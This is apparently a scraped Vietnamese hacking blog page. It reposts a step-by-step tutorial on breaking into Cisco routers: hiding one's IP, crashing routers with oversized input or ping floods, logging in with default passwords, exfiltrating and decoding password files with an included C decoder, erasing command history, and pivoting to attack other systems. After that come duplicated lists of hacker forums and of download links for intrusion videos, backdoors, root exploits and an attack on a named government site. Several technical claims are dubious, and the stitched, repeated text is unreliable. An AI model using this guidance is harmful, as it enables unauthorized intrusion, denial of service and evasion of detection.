Tấn công hệ thống Cisco
Cảnh báo:
Đây là bài viết mục dích chỉ nhằm nghiên cứu và hoc tập
KHÔNG ĐƯỢC sử dụng tài liệu này để phá hoại các hệ thống cisco, hoặc thâm nhập bất hợp pháp vào hệ thống. Tài liệu này chỉ nhằm mục đích giáo dục. Chỉ sử dụng tài liệu này một cách hợp pháp (Wargames của các hacker chẳng hạn.), và không được phá hoại bất kì cái gì. Đây là một bài học dẫn dắt từng bước một về cách một những điểm yếu của cisco dẫn tới việc có thể bị truy nhập trái phép. Nếu bạn bị bắt quả tang đang đột nhập vào một bộ dẫn đường cisco, hoặc làm rối loạn hệ thống, bạn có thể làm gián đoạn hàng trăm người dùng internet, tốn kém hàng ngàn đôla, cho nên chỉ sử dụng tài liệu này khi bạn được cho phép ! Sử dụng sai tài liệu này sẽ làm cho bạn gặp rất nhiều rắc rối.
Chú ý: một số bài học được viết cho hệ Unix, và không được chuyển soạn cho
DOS/hay tương thích Windows, cho nên bạn sẽ phải xem tài liệu này bằng trình duyệt Web, hoặc Microsoft Word.
-------------------------------------
- Phần 1: Tại sao lại xâm nhập bộ dẫn đường cisco?
- Phần 2: Tìm một bộ dẫn đường cisco như thế nào ?
- Phần 3: Làm thế nào thâm nhập vào bộ dẫn đường cisco ?
- Phần 4: Phá mật khẩu như thế nào ?
- Phần 5: Sử dụng bộ dẫn đường như thế nào ?
-----------------------------------
Những thứ CẦN biết TRƯỚC khi bạn bắt đầu:
-----------------------------------
Địa chỉ IP là gì?
Địa chỉ IP là gì?
IP là từ viết tắt của Internet Protocol, địa chỉ IP được sử dụng bởi các máy tính khác nhau để nhận biết các máy tính kết nối giữa chúng. Đây là lí do tại sao bạn lại bị IRC cấm, và là cách người ta tìm ra ISP của bạn.
Địa chỉ IP có thể dễ dàng phát hiện ra, người ta có thể lấy được qua các cách sau :
- bạn lướt qua một trang web, IP của bạn bị ghi lại
- trên IRC, bất kì ai cũng có thể có IP của bạn
- trên ICQ, mọi người có thể biết IP của bạn, thậm chí bạn chọn "do not show ip" người ta vẫn lấy được nó
- nếu bạn kết nối với một ai đó, họ có thế gõ "systat", và biết được ai đang kết nối đên họ
- nếu ai đó gửi cho bạn một email với một đoạn mà java tóm IP, họ cũng có thể tóm được IP của bạn
Có rất nhiều cách tóm địa chỉ IP, bao gồm cả việc sử dụng các chương trình back-door như Sub7 hoặc NetBus.
Thế nào là một ISP?
ISP viết tắt cho Internet Service Provider, đó là những công ty mang internet đến cho bạn. Bạn kết nối đến họ mỗi khi bạn dial-up và tạo một kết nối. Mọi người có thế phát hiện ra ISP của bạn chỉ đơn giản bằng cách traceroute bạn (traceroute sẽ được giải thích sau). Nó sẽ trông như thế này:
tracert 222.222.22.22
Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
Gói tin TCP/IP là gì?
TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, a Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người káhc!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này. Bài giảng này sẽ không đưa ra cách sử dụng biện pháp này trên bộ dẫn đường Cisco, những sẽ nằm trong tầm tay khi hack vào một hệ thống. Nếu gặp rắc rối khi bạn thử hack vào một hệ thống, sử dụng cách này...
Làm thế nào để giấi IP của bạn:
Tìm một chương trình như Genius 2 hoặc DC IS, chúng sẽ cho phép bạn chạy IdentD. Các chương trình này sẽ thay đổi phần đầu của IP máy tính của bạn ngay lập tức! Dùng cách này khi bạn bị đuổi ra khỏi IRC chat room.... bạn sẽ có thể quay lại ngay lập tức! Bạn cũng có thể sử dụng cách này khi bạn truy nhập vào một hệ thống khác và như thế nó sẽ log id sai
Sử dụng telnet :
Bạn mở telnet đơn giản băng cách chọn Start Menu rồi Run và gõ "telnet".
Một khi bạn đã mở được telnet, bạn sẽ muốn thay đổi một vài tính năng. Chọn Terminal>Preferences. Tại đây bạn có thể thay đổi kích thước vùng đệm font, và một cái thứ nữa. Bạn cũng có thể bật/tắt "local echo", nếu bạn bật,
máy tính sẽ hiển thị mọi thứ bạn gõ vào, và các máy tính khác cũng sẽ hiện cho bạn thấy.
Và bạn có thể sẽ nhận được những thông điệp tương tự như thế này.
bạn gõ "hello", và bạn nhận được
hhelelollo
Điều này xảy ra bởi vì thông tin đã phản hồi lại và những gì nhận được là những gì bạn đã gõ. Lí do duy nhất tôi dùng chương trình này bởi lẽ nó không trả về những gì bạn gõ
Mặc định, telnet sẽ kết nối với một hệ thống bằng cổng telnet, cổng số 23. Và từ bây giờ bạn sẽ không chỉ kết nối băng cổng 23, và khi bạn kết nối, bạn có thể chọn đổi sang dùng cổng 25 chẳng hạn, cổng này được dùng bởi các mail servers. Hoặc có thể là cổng 21, cho FTP. Có hàng nghì cổng, cho nên bạn phải chọn đúng cổng cần thiết
Sử dụng HyperTerminal:
HyperTerminal cho phép bạn thiết lập một "server" trên bất kì cổng nào của máy tính của bạn để thu nhận thông tin đến từ các máy tính nhất định. Để làm được điều này, chọn Start > Programs > Accessories > Communications > HyperTerminal.
Đầu tiên bạn cần phải lựa chọn kết nối, bấm "TCP/IP Winsock", và sau đó đặt vào máy tính mà bạn kết nối với, và số cổng. Bạn có thể sai khiến nó nghe ngóng đầu vào bằng cách chọn Call>Wait for Call. Và bây giờ các máy tính khác có thể kết nối với bạn bằng cổng đó, và bạn có thể chat hay truyền file.
Sử dụng Ping:
Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping địa_chỉ_ip", mặc định sẽ ping 4 lần, nhưng bạn cũng có thể gõ
"ping ip.address -t"
Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:
"ping -l (size) địa_chỉ_ip "
Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định được tốc độ của kết nối, và thời gian cần để một gói tin đi và quay trở lại và chia bốn (gọi là "trip time"). Ping cũng có thể được dùng để làm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt ping (Bộ đệm của kết nối bị tràn – có qua nhiều kết nối, nên Windows quyết định cho nó đi nghỉ một chút). Một cuộc tấn công “ping flood” sẽ chiếm rất nhiều băng thông của bạn, và bạn phải có băng thông lớn hơn đối phương ( trừ khi đối phương là một máy chạy Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục đối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm đổi với những đối phương mạnh hơn một chút. trừ khi bạn có nhiều đường và bạn kiểm soát một số lượng tương đối các máy chủ cùng ping mà tổng băng thông lơn hơn đối phương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cách liên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tế là phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable Operating System Interface dựa trên uniX), nếu không nó sẽ không phải là một bản Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ có tham số -f.
Sử dụng TraceRoute:
Để lần theo kết nối của bạn(và xem tất cả các máy tính nằm giữa bạn và mục tiêu), chỉ cần mở MS-DOS prompt, và gõ "tracert địa_chỉ_ip" và bạn sẽ thấy một danh sách các máy tính nằm trên đường giưa máy tính bạn và đối phương.
Bạn có thể dùng cách này để xác định xem liệu có firewalls chặn? Và cách này cũng cho phép xác định ISP của một ai đó (Internet Service Provider).
Để xác định ISP, chỉ việc đơn giản xem địa chỉ IP trước cái cuối cùng, đây chắc chắn là một trong các bộ dẫn đường của một ISP.
Bản chất là gì? Đây là cách mà traceroute làm việc - một gói tin TCP/IP có một giá trị trong phần đầu (đó là phần IP. Nếu bạn không biết nó là gì, hãy bỏ qua vàthen ignore nó và đọc tiếp, điều đó không quan trọng) gọi là TTL, viết tăt cho Time To Live. Một khi gói tin đi qua một bộ dẫn đường thì TTL của nó bị trừ đi một. Đây là cách một bộ đếm chống lại khả năng xảy ra lỗi và một gói tin sẽ bắn ra khắp nơi trên mạng, và lãng phí băng thông.
Cho nên khi một TTL cua một gói tin bằng 0, nó sẽ chết và một lỗi ICMP được gửi trả về người gửi.
Bởi thế, đầu tiên traceroute gửi đi một gói tin có TTL bằng 1. Gói tin sẽ trở lại nhanh chóng, qua việc nhận biết địa chỉ người gử trong phần đầu của thông báo lỗi ICMP, traceroute biết gói tin đã ở đâu trong lần bắn đầu tiên. Sau đó nó gửi một gói tin với TTL có giá trị là 2, và nhận được kết quả trả về của lần bắn 2, mang theo định danh của máy. Và điều này xả ra cho đến khi gói tin đến đích.
Thật thú vị phải không? :-)
Sử dụng proxy server:
Hãy tìm một proxy server chạy trên một cổng mà bạn chọn. Một khi bạn tìm ra, kết nối đến nó bằng telnet hoặc hyperterminal và sau đó nối đến máy tính khác bằng proxy server. Bằng cách này máy tính ở đầu kia sẽ không biết được địa IP của bạn.
----------------------------------
Phần 1: Tại sao lại hack cisco router?
Có thể bạn thắc mắc.. tại sao lại hack cisco router?
Lí do là chúng thật là hữu ích để bẻ khoá các hệ thống khác...
Cisco routers rất nhanh, một số có tốc độ kết nối 18 T1 trên một hệ thống, và chúng rất linh hoạt và chúng có thể sử dụng cho các cuộc tấn công DoS hoặc hack vào các hệ thống khác bởi vì hầu hết chúng chạy telnet.
Có hàng nghìn gói tin chạy qua chúng một lúc, và ta có thể bắt và giải mã các gói tin... Rất nhiều cisco routers được tin cậy, và cho phép bạn truy nhập nhất định vào các máy tính khác trong mạng của nó.
----------------------------------
Phần 2: Tìm một cisco router
Tìm bộ dẫn đường Cisco là công việc tương đối dễ, hầu hế mỗi ISP đều dẫn qua ít nhất một cisco router. Cách dễ nhất để tìm ra một bộ dẫn đường Cisco là chạy traceroute từ dos (gõ "tracert" và địa chỉ IP của một máy tính khác), bạn có thể lần ra nhiều thông tin nhờ các máy tính mà nó hiện ra giữa máy tính bạn và máy tính của họ. Một trong số những hệ thống này có thể có cụm từ "cisco" trong tên của nó. Nếu bạn tìm thấy điều gì đó tương tự như vậy, hãy copy lại địa chỉ IP của nó.
Giờ đây bạn đã biết nơi có một cisco router, nhưng nó có thể được bảo vệ bởi firewall, bạn nên kiểm tra xem nó có được bảo vệ không bằng cách ping nó một vài lần, nếu bạn nhận được trả lời thì có thể là nó không bị khoá. Một cách làm khác là thử truy nhập vào một số cổng của cisco router, điều này được thực hiện dễ dàng bằng cách sử dụng telnet, và tạo một kết nối tới router bằng cổng 23.. Nếu nó đòi password, mà không hỏi username nghĩa là bạn đang kề bên router, nhưng nếu nó đòi username, thì có lẽ là đã bị firewall.
Thử tìm một router không có firewall, bởi lẽ bài giảng này tutorial là về routers chứ không phải về cách qua firewalls. Khi bạn đã tìm ra một hệ thống ổn định, bạn cần tìm một proxy server cho phép sử dụng cổng 23, bằng cách này IP của bạn sẽ không bị lưu lại bởi router.
---------------------------------
Phần 3: Đột nhập cisco router
Các Cisco router chạy phiên bản v4.1 (hiện còn rất phổ biến) có thể hạ gục dễ dàng. Bạn chỉ cần kết nối với router bằng cổng 23 qua proxy server, và nhập vào một chuỗi password KHỔNG LỒ, như là;
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv019
dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029 3847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1 0293847465qpwoeirutyalskdjfhgzmx
ncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk10293847465qpwoeirutyalskdjfh
gzmxncbv019dsk
Chờ một chút, hệ thống cisco có thể sẽ khởi động lại, trong trường hợp đó bạn sẽ không hack được bởi vì chúng offline.. Nhưng chúng thường treo khoảng 2-10 phút, và bạn có thể thâm nhập được.
Nếu cả hai trường hợp đều không xảy ra, nghĩa là nó không chạy phần mềm ngon ăn, trong trường đó bạn có thể thử một vài kiểu tấn công DoS, giống như một lượng ping khổng lồ. Mở dos và gõ "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.
Khi bị treo, mở một kết nối khác đến một vài proxy khác, và dùng password "admin", lí do vì đây là mật khẩu mặc định của router, và khi nó tạm thời bị ngắt nó sẽ chuyển sang chế độ mặc định.
Khi bạn đã đăng nhập, bạn cần giành lấy file password ! Các hệ thống chạy những phần mềm khác nhau nhưng đa số sẽ có lệnh "htl-textil" hoặc gì đó, bạn gõ "?" để hiện ra danh sách các lệnh, bạn sẽ thấy một danh sách khổng lồ các lệnh, ở đâu đó bạn sẽ thấy một lệnh chuyển đổi, dùng nó để lấy password file của admin (người dùng hiện tại) và gửi đến địa chỉ IP ở cổng 23. Nhưng trước khi làm vậy, hãy đặt HyperTerminal chờ thông tin từ cisco router. Một khi bạn gửi file file, HyperTerminal sẽ hỏi xem bạn có đồng ý nhận file này không, chọn đồng ý và lưu nó xuống đĩa. Thoát.
Bạn đã qua phần khó khăn nhất, nghỉ một chút và chuẩn bị phá password!
------------------------------
Phần 4: phá password
Giờ đây bạn đã có được file password, bạn cần phải bẻ khoá nó thì mới có thể truy nhập access router lần nữa. Để làm việc này cần chạy một chương trình đại loại như John the Ripper hoặc một chương trình nào khác để bẻ file password, và bạn có thể bẻ khoá được nó.
Đây là cách dễ nhất, và tôi khuyên bạn dùng cách này. Một cách có thể thử bẻ khoá chúng. Để làm vạy bạn cần một phần mềm giải mã, phải thật kiên nhẫn.
Để giải mã cisco password, bạn phải dịch đoạn mã sau trong linux:
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Nếu bạn không có Linux, chỉ còn nước bẻ password bằng cách tấn công từ điển hoặc brute-force file đó bằng John the Ripper hoặc một chương trình bẻ khoá khác.
-------------------------------
Phần 5: Sử dụng router
Để sử dụng thiết bị cao cấp tuyệt vời này, bạn phải kết nối tới chúng, sử dụng proxy nếu không muốn IP của bạn log. Khi đã đăng nhập, bạn nên tắt phần history để không ai có thể biết bạn đã làm gì, gõ vào "terminal history size 0". Và nó sẽ chẳng ghi lại gì! Gõ "?" để hiện một danh sách tất cả các lệnh của router, và bạn sẽ dùng được hầu hết trong số chúng.
Các router thường có telnet, và bạn có thể dùng telnet để kết nối connect tới các hệ thống khác, (như một hệ unix) và hack chúng. Nó cũng được trang bị ping và traceroute-bạn có thể sử dụng chúng để theo dõi hệ thống hoặ tấn công DoS. Bạn còn có thể sử dụng nó để bắt các gói tin, nhưng tôi khuyên bạn không nên, bởi lẽ không phải lúc nào nó cũng hoạt động, và có thể làm cho bạn bị phát hiện...
(Sưu Tầm)
url:http://www.ddcntt.vn/forum/showthread.php?t=396
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Thursday, October 2, 2008
Friday, September 12, 2008
Danh sách các forum hacker vietnam
http://www.vnsecurity.com
http://www.vnmagic.org
http://ww.hvaonline.net
http://www.vnbrain.net
http://www.hcegroup.net
http://www.viethacker.org
http://www.thegioingam.biz
http://www.vietxpert.name
http://www.vhz.vn
http://www.vnres.net
http://www.hack2learn.net
http://www.viet4all.biz
http:www.vietfrauders.org
http:www.en-hack.net
http:www.viet4all.biz
http:www.beyeugroup.com
http:www.vniss
url:http://www.binhphuoc.org/diendan/showthread.php?t=3821
http://www.vnmagic.org
http://ww.hvaonline.net
http://www.vnbrain.net
http://www.hcegroup.net
http://www.viethacker.org
http://www.thegioingam.biz
http://www.vietxpert.name
http://www.vhz.vn
http://www.vnres.net
http://www.hack2learn.net
http://www.viet4all.biz
http:www.vietfrauders.org
http:www.en-hack.net
http:www.viet4all.biz
http:www.beyeugroup.com
http:www.vniss
url:http://www.binhphuoc.org/diendan/showthread.php?t=3821
bộ sưu tập tổng hợp link down các video dạy hack(full version)
bộ sưu tập tổng hợp link down các video dạy hack(full version)
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha
1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[Video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html
url:http://www.binhphuoc.org/diendan/showthread.php?t=1158
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha
1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
